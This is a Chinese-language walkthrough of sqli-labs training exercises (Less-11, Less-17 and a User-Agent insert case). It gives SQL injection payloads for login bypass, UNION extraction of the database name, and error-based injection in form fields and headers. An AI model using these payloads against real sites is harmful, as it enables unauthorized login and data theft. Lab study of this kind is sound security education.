(1)sql注入之萬能密碼(sqli-labs-master/Less-11)
這是一個使用用戶名和密碼登錄的頁面,當輸入正確時效果如下,它會回顯你的用戶名和密碼
這是執行操作的SQL語句:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
我們可以看到這是POST型,使用burp suite代理;
註釋法
用戶名處 :admin‘ # //這樣就會註釋掉後面的語句,也就不需要輸入密碼
添加【or】
admin’ or ‘1’=‘1 //or的用法是有一個條件爲真,即爲真,語句便會執行,這樣我們也不需要輸入密碼
傳統注入
uname=0' union all select database(),2 --+&passwd=0&submit=Submit //聯合查詢注入
(2)update型(sqli-labs-master/Less-17)
重置密碼:這是一個重置密碼的網頁,我們可以判斷它的SQL語句爲updata;當我們輸入信息後,只會提示正確,而沒有其他回顯位。如下:
雖然沒用回顯位,但是可以拋出異常,初步判斷可以使用報錯型注入。
uname=admin&passwd=123' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database()))--+&submit=Submit
(3) insert型
UA字段:這裏當我們登錄後頁面會顯示一個UA字段的信息,我們可以修改UA的信息來進行注入,
通過判斷,它的閉合方式爲單引號' '閉合,我們在其前面和後面分別構造語句形成閉合,然後在中間利用and插入我們想要的SQL語句。
User-Agent:1' and (select count(*) from information_schema.tables group by concat(floor(rand(0)*2),0x7e,database())) and 1='1